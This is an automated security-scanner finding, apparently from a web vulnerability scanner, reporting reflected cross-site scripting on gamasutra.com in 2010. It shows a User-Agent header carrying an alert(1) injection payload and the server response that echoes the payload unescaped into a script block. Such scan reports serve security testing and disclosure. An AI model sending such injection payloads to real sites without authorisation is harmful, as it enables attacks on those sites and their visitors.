1. Cross-site scripting (reflected)
Severity: | Low |
Confidence: | Certain |
Host: | http://gamasutra.com |
Path: | / |
GET / HTTP/1.1 Host: gamasutra.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7a183"-alert(1)- Connection: close |
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 01:55:02 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.3.2 ZendServer/5.0 Connection: close Content-Type: text/html Content-Length: 109267 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <script t ...[SNIP]... s.prop1=""; s.prop2=""; s.prop3="Gamasustra | | GAMASUTRA"; s.prop4="GAMASUTRA"; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)7a183"-alert(1)- s.prop9=""; s.prop10=""; s.prop13="http://www /* Conversion Variables */ s.campaign=""; s.state=""; s.zip=""; s.events="event5"; s.products=""; s.purchaseID=""; ...[SNIP]... |